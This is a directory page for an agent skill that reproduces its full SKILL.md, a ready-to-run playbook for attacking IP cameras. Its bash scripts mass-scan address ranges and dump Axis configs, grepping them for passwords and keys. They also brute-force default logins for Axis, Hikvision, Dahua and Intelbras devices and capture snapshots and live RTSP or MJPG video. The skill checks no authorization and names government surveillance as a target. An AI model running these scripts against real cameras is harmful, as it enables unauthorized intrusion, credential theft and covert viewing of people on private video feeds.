Agent skill

Iot Camera Recon

by uphiago in uphiago/recon-skills

Attack cameras via RTSP, ONVIF, Axis config when 554 open. An agent skill from uphiago/recon-skills.

MITAuto-check passedSecurity

Install Iot Camera Recon

skills CLI
$ npx skills add uphiago/recon-skills --skill iot-camera-recon -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install uphiago/recon-skills iot-camera-recon --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/recon/iot-camera-recon .claude/skills/iot-camera-recon && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
iot-camera-recon
GitHub stars
1.3k
Token cost
~2.3k tokens
SKILL.md length
293 words
Files
1
Skills in repo
23
Repo updated
First seen
Licence
MIT

At a glance

Attack cameras via RTSP, ONVIF, Axis config when 554 open. An agent skill from uphiago/recon-skills.

  • Works in 4 steps: Mass Camera Discovery → Axis Camera Full Exploitation → Default Credential Testing → …
  • Tasks that involve Bug bounty
  • SKILL.md covers When to Use, Prerequisites, How to Run and Quick Reference, plus 3 more sections
  • Calls curl and python3; reaches w3.org and onvif.org

What it does

Iot Camera Recon is an agent skill from uphiago/recon-skills. Attack cameras via RTSP, ONVIF, Axis config when 554 open.

Its SKILL.md is about 2.3k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts. Compatibility notes: Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei

It sits in Security, covering Bug bounty. The repository describes itself as: Recon & pentest skill pack. CORS, XSS, SQLi, SSRF, RCE, WordPress, MCP, cloud, subdomain takeover, and more. Field-tested. MIT. Full write-up at hiago.sh. The licence is MIT.

When your agent uses it

  • Tasks that involve Bug bounty

Example prompts

  • “/iot-camera-recon”

Requirements

  • Python 3
  • Compatibility (from SKILL.md): Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei

Workflow steps

4 steps, taken from the step headings in SKILL.md.

  1. Mass Camera Discovery
  2. Axis Camera Full Exploitation
  3. Default Credential Testing
  4. RTSP Stream Access

What it can do on your machine

Read from SKILL.md and the folder at commit 1260244. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Shell commands in SKILL.md call:

    • curl
    • python3

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    Hosts in commands or code, which the agent is likely to contact:

    • w3.org
    • onvif.org

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

  • Compatibility

    Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei

    From compatibility in the SKILL.md frontmatter.

Context cost

Iot Camera Recon loads about 2.3k tokens when it runs. Until then it costs about 19 tokens; SKILL.md has 293 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~19
When it runs · the whole SKILL.md, loaded when a task matches
~2.3k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check passed

The automated check found no risky patterns in SKILL.md.

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.

SKILL.md

The full file from uphiago/recon-skills at commit 1260244, republished under its MIT licence (© uphiago). 293 words, ~2,345 tokens.

Download SKILL.mdSave it as .claude/skills/iot-camera-recon/SKILL.md (or your agent's skills folder).
name
iot-camera-recon
description
Attack cameras via RTSP, ONVIF, Axis config when 554 open.
compatibility
Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei
version
1.1.0
revision_date
2026-07-25
license
MIT
platforms
linux
tags
recon, camera, IoT, RTSP, ONVIF, Axis, Hikvision
category
recon
related_skills
port-mass-scan, port-service-discovery

IoT Camera Recon Skill

IP camera assessment covering RTSP exposure, vendor configuration endpoints, ONVIF service enumeration, authentication controls, and firmware identification.

When to Use

  • port-mass-scan finds RTSP (554) or camera HTTP ports (80, 8010, 8011).
  • Target is a physical security company, traffic management, or government surveillance.
  • Shodan search reveals camera devices in the target's IP range.
  • After port-service-discovery finds Axis/Hikvision/Dahua ONVIF services.

Prerequisites

  • terminal with curl, python3.
  • For mass scanning: masscan or RustScan (see port-mass-scan).
  • VLC or ffmpeg for stream verification (optional).

How to Run

bash
# Quick camera detection on known IP
curl -sk --max-time 5 --connect-timeout 5 "http://IP:8010/axis-cgi/jpg/image.cgi" -o snapshot.jpg
curl -sk --max-time 5 --connect-timeout 5 "http://IP:8010/axis-cgi/admin/param.cgi?action=list" | head -50

# Mass RTSP discovery on a /24
masscan -p554,80,8010,8011 --rate=10000 192.168.0.0/24 -oJ cameras.json

Quick Reference

Camera BrandDefault HTTP PortSnapshot URLConfig URLDefault Creds
Axis80, 8010/axis-cgi/jpg/image.cgi/axis-cgi/admin/param.cgi?action=listroot:pass, root:admin
Hikvision80, 554/ISAPI/Streaming/channels/101/picture/System/configurationFile?auth=...admin:12345, admin:admin
Dahua80, 554/cgi-bin/snapshot.cgi/cgi-bin/configManager.cgi?action=getConfigadmin:admin, admin:password
Intelbras80/cgi-bin/snapshot.cgi/web/cgi-bin/hi3510/param.cgiadmin:admin, admin:123456
ONVIF80, 8899N/A (SOAP)/onvif/device_serviceadmin:admin

Procedure

Phase 1 — Mass Camera Discovery
bash
RANGE="$1"  # e.g., [REDACTED_IP]/16
OUTDIR="$OUTDIR/cameras"
mkdir -p "$OUTDIR"

echo "[*] Camera hunt on $RANGE"

# Masscan for RTSP + camera HTTP ports
masscan -p554,80,8010,8011,8899 --rate=50000 "$RANGE" -oJ "$OUTDIR/masscan_cameras.json"

# Extract IPs with open camera ports
HITS=$(python3 -c "
import json
with open('$OUTDIR/masscan_cameras.json') as f:
    ips = set()
    for line in f:
        try:
            data = json.loads(line.strip()) if line.strip() else {}
            ips.add(data.get('ip', ''))
        except: pass
    for ip in sorted(ips):
        print(ip)
" 2>/dev/null)

echo "[+] $(echo "$HITS" | wc -l) IPs with camera ports"

# Probe each with curl
echo "$HITS" | while read ip; do
  echo "--- $ip ---"

  # Axis snapshot
  code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 3 --connect-timeout 3 "http://$ip:8010/axis-cgi/jpg/image.cgi")
  [[ "$code" == "200" ]] && echo "  [AXIS] Snapshot: http://$ip:8010/axis-cgi/jpg/image.cgi"

  # Axis config dump
  config=$(curl -sk --max-time 5 --connect-timeout 5 "http://$ip:8010/axis-cgi/admin/param.cgi?action=list" 2>/dev/null)
  if [[ -n "$config" ]] && echo "$config" | grep -q "root.Brand"; then
    BRAND=$(echo "$config" | grep "root.Brand.Brand=" | cut -d= -f2 | tr -d '"')
    MODEL=$(echo "$config" | grep "root.Brand.ProdShortName=" | cut -d= -f2 | tr -d '"')
    FIRMWARE=$(echo "$config" | grep "root.Properties.Firmware.Version=" | cut -d= -f2 | tr -d '"')
    SERIAL=$(echo "$config" | grep "root.Properties.System.SerialNumber=" | cut -d= -f2 | tr -d '"')
    echo "  [CONFIG] $BRAND $MODEL — Firmware: $FIRMWARE — Serial: $SERIAL"
    echo "$config" | wc -l | xargs echo "  Parameters:"
  fi

  # Generic RTSP
  for port in 554 8554; do
    code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 3 --connect-timeout 3 "http://$ip:$port/")
    [[ "$code" != "000" ]] && echo "  [RTSP] Port $port responds (HTTP $code)"
  done

  # ONVIF discovery (port 8899 or 80)
  for port in 8899 80; do
    resp=$(curl -sk --max-time 5 --connect-timeout 5 -X POST "http://$ip:$port/onvif/device_service" \
      -H "Content-Type: application/soap+xml" \
      -d '<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope"><s:Body><GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/></s:Body></s:Envelope>' 2>/dev/null)
    if echo "$resp" | grep -qi "manufacturer\|model\|serial"; then
      echo "  [ONVIF] Device info available on port $port"
    fi
  done
done
Phase 2 — Axis Camera Full Exploitation
bash
IP="$1"

echo "[*] Axis camera exploitation on $IP"

# 1. Snapshot
curl -sk --max-time 5 --connect-timeout 5 "http://$IP:8010/axis-cgi/jpg/image.cgi" -o "axis_${IP//./_}_snapshot.jpg"
echo "[+] Snapshot saved"

# 2. Full config dump (988 parameters on Axis P1378-LE)
curl -sk --max-time 10 --connect-timeout 10 "http://$IP:8010/axis-cgi/admin/param.cgi?action=list" -o "axis_${IP//./_}_config.txt"
PARAM_COUNT=$(wc -l < "axis_${IP//./_}_config.txt")
echo "[+] Config dump: $PARAM_COUNT parameters"

# 3. Extract sensitive parameters
echo "[*] Sensitive parameters:"
grep -iE 'password|user|token|key|serial|license|cert|network\.eth0\.IP' "axis_${IP//./_}_config.txt" | head -20

# 4. MJPG video stream
curl -sk --max-time 5 --connect-timeout 5 "http://$IP:8010/axis-cgi/mjpg/video.cgi" -o "axis_${IP//./_}_stream.mjpg" &
sleep 3; kill %1 2>/dev/null
STREAM_SIZE=$(stat -c%s "axis_${IP//./_}_stream.mjpg" 2>/dev/null || echo 0)
[[ "$STREAM_SIZE" -gt 1000 ]] && echo "[+] Live MJPG stream captured (${STREAM_SIZE} bytes)"

# 5. List available services
for svc in "admin" "viewer" "operator" "ptz" "applications" "local"; do
  code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 3 --connect-timeout 3 "http://$IP:8010/axis-cgi/$svc/")
  [[ "$code" != "404" && "$code" != "000" ]] && echo "  Service: /axis-cgi/$svc/ (HTTP $code)"
done
Phase 3 — Default Credential Testing
bash
IP="$1"
BRAND="${2:-axis}"  # axis, hikvision, dahua, intelbras

echo "[*] Default credential test on $IP ($BRAND)"

# Brand-specific default credentials
case "$BRAND" in
  axis)
    CREDS=("root:pass" "root:admin" "root:root" "root:12345" "admin:admin" "admin:12345")
    AUTH_URL="http://$IP:8010/axis-cgi/admin/param.cgi?action=list"
    ;;
  hikvision)
    CREDS=("admin:12345" "admin:admin" "admin:123456" "admin:password")
    AUTH_URL="http://$IP/ISAPI/System/deviceInfo"
    ;;
  dahua)
    CREDS=("admin:admin" "admin:password" "admin:123456" "admin:admin123")
    AUTH_URL="http://$IP/cgi-bin/snapshot.cgi"
    ;;
  intelbras)
    CREDS=("admin:admin" "admin:123456" "admin:password" "admin:admin123")
    AUTH_URL="http://$IP/cgi-bin/snapshot.cgi"
    ;;
  *)
    CREDS=("admin:admin" "admin:12345" "root:admin" "admin:password")
    AUTH_URL="http://$IP/"
    ;;
esac

for cred in "${CREDS[@]}"; do
  USER="${cred%%:*}"
  PASS="${cred##*:}"
  code=$(curl -sk -o /dev/null -w "%{http_code}" --max-time 5 --connect-timeout 5 \
    -u "$USER:$PASS" "$AUTH_URL" 2>/dev/null)

  if [[ "$code" == "200" ]]; then
    echo "  [CRITICAL] DEFAULT CREDENTIALS: $cred"
  elif [[ "$code" == "401" ]]; then
    echo "  [-] $cred (auth failed)"
  else
    echo "  [$code] $cred"
  fi
done
Phase 4 — RTSP Stream Access
bash
IP="$1"
PORT="${2:-554}"

echo "[*] RTSP stream access on $IP:$PORT"

# Common RTSP paths
STREAMS=(
  "/live" "/stream" "/cam/realmonitor"
  "/h264" "/h264/ch1/main/av_stream"
  "/Streaming/Channels/101" "/ISAPI/Streaming/channels/101"
  "/axis-media/media.amp" "/onvif1" "/onvif2"
)

for stream in "${STREAMS[@]}"; do
  RTSP_URL="rtsp://$IP:$PORT$stream"
  echo -n "  $stream: "

  # Test with ffmpeg (2 second probe)
  timeout 3 ffprobe -v quiet -rtsp_transport tcp "$RTSP_URL" 2>/dev/null
  if [[ $? -eq 0 ]]; then
    echo "LIVE STREAM"
  else
    echo "no response"
  fi
done

# Try with default credentials
for cred in "admin:admin" "admin:12345" "root:pass"; do
  RTSP_URL="rtsp://${cred}@$IP:$PORT/live"
  timeout 3 ffprobe -v quiet -rtsp_transport tcp "$RTSP_URL" 2>/dev/null
  [[ $? -eq 0 ]] && echo "  [CRITICAL] RTSP stream accessible with $cred"
done

Pitfalls

  • CGNAT blocks direct camera access. Many cameras are behind carrier-grade NAT and unreachable from internet.
  • RTSP over UDP is unreliable. Use -rtsp_transport tcp for reliable stream testing.
  • Config dump can be LARGE. Axis configs are 50-200KB. Use --max-time to avoid hanging on slow connections.
  • Video streams are bandwidth-heavy. Test with snapshot first, then short stream probes.
  • Camera firmware is rarely updated. 2020 firmware on a 2026 scan is common — don't assume patches.

Verification

  • Snapshot URL MUST return a valid JPEG image (check with file command).
  • Config dump MUST contain camera-specific parameters (Brand, Model, Serial Number, Firmware Version).
  • RTSP stream MUST produce video frames (verified with ffprobe or VLC).
  • Default credentials MUST grant access to protected endpoints (HTTP 200 with auth vs 401 without).
  • All exposed parameters must be documented: brand, model, serial, firmware version, network config, credentials found.

© uphiago, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

Just SKILL.md in recon/iot-camera-recon of uphiago/recon-skills.

Open the folder on GitHubat commit 1260244

Compare with similar skills

Iot Camera Recon next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Iot Camera Recon compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Iot Camera Recon this skilluphiago/recon-skills1.3k—~2.3kAutomated safety check: PassMIT
Web3 Smart Contract Auditawarexone/Agentic-Bug-Hunter5.3k3 repos~4.5kAutomated safety check: PassMIT
Bug Bounty Hunting Methodologyawarexone/Agentic-Bug-Hunter5.3k2 repos~4.7kAutomated safety check: PassMIT
Metabigor OSINT Reconj3ssie/metabigor1.9k—~2.4kAutomated safety check: PassMIT
Wooyun Legacytanweai/wooyun-legacy1.8k—~1.9kAutomated safety check: PassCustom licence
Client Request Signature Reversalawarexone/Agentic-Bug-Hunter5.3k—~4.7kAutomated safety check: PassMIT

Similar skills

  • Web3 Smart Contract Audit

    awarexone/Agentic-Bug-Hunter

    Guides smart contract audits and bounty target selection with ten DeFi bug classes, kill signals, a Foundry PoC template and grep patterns.

    5.3k GitHub starsUsed in 3 repos~4.5k tokens
    SecurityAuto-check passed
  • Bug Bounty Hunting Methodology

    awarexone/Agentic-Bug-Hunter

    Orchestrates a bug bounty session with a 5-phase workflow and a critical-thinking framework covering developer psychology, anomaly detection and What-If experiments.

    5.3k GitHub starsUsed in 2 repos~4.7k tokens
    SecurityAuto-check passed
  • Metabigor OSINT Recon

    j3ssie/metabigor

    Operates the metabigor CLI to map a target's network ranges, subdomains, ports, related domains, CDNs and archived URLs from free sources without API keys.

    1.9k GitHub stars~2.4k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Wooyun Legacy

    tanweai/wooyun-legacy

    WooYun business logic vulnerability methodology — 22,132 real cases across 6 domains (authentication bypass, authorization bypass, payment tampering, information disclosure, logic flaws…

    1.8k GitHub stars~1.9k tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Client Request Signature Reversal

    awarexone/Agentic-Bug-Hunter

    Recovers a client-side request signature or anti-bot token just far enough to replay blocked requests in bug bounty testing, starting from a captured packet.

    5.3k GitHub stars~4.7k tokensUpdated 3 days ago
    SecurityAuto-check passed
  • Web3 Bug Bounty AI Tools

    tradecatlabs/vibe-coding-cn

    A selection guide to AI-driven tools for Web3 bug bounty work, from autonomous web pentesters to smart contract bug finders, with notes on authorization.

    17k GitHub starsUsed in 2 repos~3.9k tokens
    SecurityAuto-check: warnings

More from uphiago/recon-skills

All 23 skills in this repo
  • Flags API endpoints whose data or actions look like they should need a login but currently don't, as part of authorized security testing.

    1.3k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed
  • Error Log Mining

    uphiago/recon-skills

    Mine errorlog for creds, paths, SQL when leak hunt finds. An agent skill from uphiago/recon-skills.

    1.3k GitHub stars~3.3k tokensUpdated 1 mo ago
    Auto-check passed
  • JS Secrets Extraction

    uphiago/recon-skills

    Analyze JS bundles and source maps for hardcoded secrets, API keys, JWTs, and internal endpoints

    1.3k GitHub stars~2.6k tokensUpdated 1 mo ago
    Auto-check passed
  • Recon Playbook

    uphiago/recon-skills

    A skill your agent uses when starting or restructuring an authorized external web and API assessment.

    1.3k GitHub stars~1.9k tokensUpdated 1 mo ago
    Auto-check passed
  • Web Enumeration

    uphiago/recon-skills

    Sensitive file scanning, path traversal bypass, vHost enum, .env extract, log mining, Varnish detect

    1.3k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check: notes
  • 401 403 Bypass Techniques

    uphiago/recon-skills

    A skill your agent uses when protected HTTP routes return 401 or 403.

    1.3k GitHub stars~3.1k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Iot Camera Recon

What does Iot Camera Recon do?

Attack cameras via RTSP, ONVIF, Axis config when 554 open. An agent skill from uphiago/recon-skills. Iot Camera Recon is an agent skill from uphiago/recon-skills. Attack cameras via RTSP, ONVIF, Axis config when 554 open.

When should I use Iot Camera Recon?

Iot Camera Recon fits situations like: tasks that involve Bug bounty.

How do I install Iot Camera Recon in Claude Code?

Run `npx skills add uphiago/recon-skills --skill iot-camera-recon -a claude-code`. Or copy the skill folder (recon/iot-camera-recon in uphiago/recon-skills) into .claude/skills/iot-camera-recon in your project. Claude Code loads it when a task matches its description.

How do I install Iot Camera Recon in Codex?

Run `npx skills add uphiago/recon-skills --skill iot-camera-recon -a codex`. Or copy the skill folder (recon/iot-camera-recon in uphiago/recon-skills) into .agents/skills/iot-camera-recon in your project. Codex loads it when a task matches its description.

Can I use Iot Camera Recon in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add uphiago/recon-skills --skill iot-camera-recon -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/iot-camera-recon, .gemini/skills/iot-camera-recon, .github/skills/iot-camera-recon and .opencode/skills/iot-camera-recon in your project.

What does Iot Camera Recon need to run?

Going by SKILL.md and its folder, Iot Camera Recon needs the command-line tools its instructions call (curl and python3). Our summary lists: Python 3. Compatibility (from SKILL.md): Requires curl, nmap, python3, masscan, subfinder, httpx, nuclei.

Does Iot Camera Recon access the network?

SKILL.md names 2 domains. In commands or code: w3.org and onvif.org; the agent is likely to contact these when it follows the instructions. This is read from the text; nothing was executed.

Is Iot Camera Recon safe to install?

Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.

What licence does Iot Camera Recon use?

Iot Camera Recon is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Iot Camera Recon use?

About 2.3k tokens (SKILL.md is roughly 9.4k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.

What are the alternatives to Iot Camera Recon?

Skills that share tags, products or a category with Iot Camera Recon: Web3 Smart Contract Audit (awarexone/Agentic-Bug-Hunter, 5.3k stars), Bug Bounty Hunting Methodology (awarexone/Agentic-Bug-Hunter, 5.3k stars), Metabigor OSINT Recon (j3ssie/metabigor, 1.9k stars) and Wooyun Legacy (tanweai/wooyun-legacy, 1.8k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Iot Camera Recon?

uphiago (a GitHub user) maintains it in uphiago/recon-skills, which has 1,294 GitHub stars. The repository holds 23 skills in this directory. The repository was last updated on September 1, 2026.

Source: uphiago/recon-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.